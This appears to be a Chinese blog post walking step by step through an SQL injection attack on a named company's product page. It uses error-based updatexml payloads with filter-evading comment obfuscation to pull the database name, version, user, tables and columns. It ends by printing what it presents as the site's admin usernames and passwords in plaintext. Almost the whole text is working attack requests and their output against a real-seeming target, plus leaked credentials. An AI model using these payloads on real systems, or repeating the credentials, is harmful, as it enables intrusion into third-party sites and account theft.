注入点:
http://www.iluminacionestriac.com/ver-producto.php?id=12
1、判断存在注入:
http://www.iluminacionestriac.com/ver-producto.php?id=12-0
http://www.iluminacionestriac.com/ver-producto.php?id=12-1
返回不同,存在注入
2、字段长度:
http://www.iluminacionestriac.com/ver-producto.php?id=12 order by 5 正常
http://www.iluminacionestriac.com/ver-producto.php?id=12 order by 6 错误
长度为5
3、数据库名称:
http://www.iluminacionestriac.com/ver-producto.php?id=a()
Database query failed: FUNCTION iluminac_portal.a does not exist
数据库名称为:iluminac_portal
4、数据库版本号:
http://www.iluminacionestriac.com/ver-producto.php?id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/ version()),0x7e),1)
版本为:5.5.23-55
5、数据库用户名:
http://www.iluminacionestriac.com/ver-producto.php?id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/ user()),0x7e),1)
用户名为:iluminac_triac@localhost
6、暴库:
http://www.iluminacionestriac.com/ver-producto.php?id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/schema_name /*!%0afrom*/ information_schema.schemata LIMIT 1,1),0x7e),1)
名称:iluminac_portal
7、暴表:
http://www.iluminacionestriac.com/ver-producto.php?id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/table_name /*!%0afrom*/ information_schema./*!%0ctables*/ where table_schema=0x696C756D696E61635F706F7274616C LIMIT 9,1),0x7e),1)
名称:archivos,categorias,fotos,general,noticias,paginas,productos,secciones,sef,users,videos
8、暴字段:
http://www.iluminacionestriac.com/ver-producto.php?id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/column_name /*!%0afrom*/ information_schema.columns where table_name='users' LIMIT 0,1),0x7e),1)
结果:id,username,password,nombre,apellidos,email
9、用户名和密码:
http://www.iluminacionestriac.com/ver-producto.php?id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*//*!%0aconcat*/(username,0x3a,password) from users limit 0,1),0x7e),1)
结果:
admin:solnet
usuario:753951
from www.waitalone.cn.thanks for it.
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论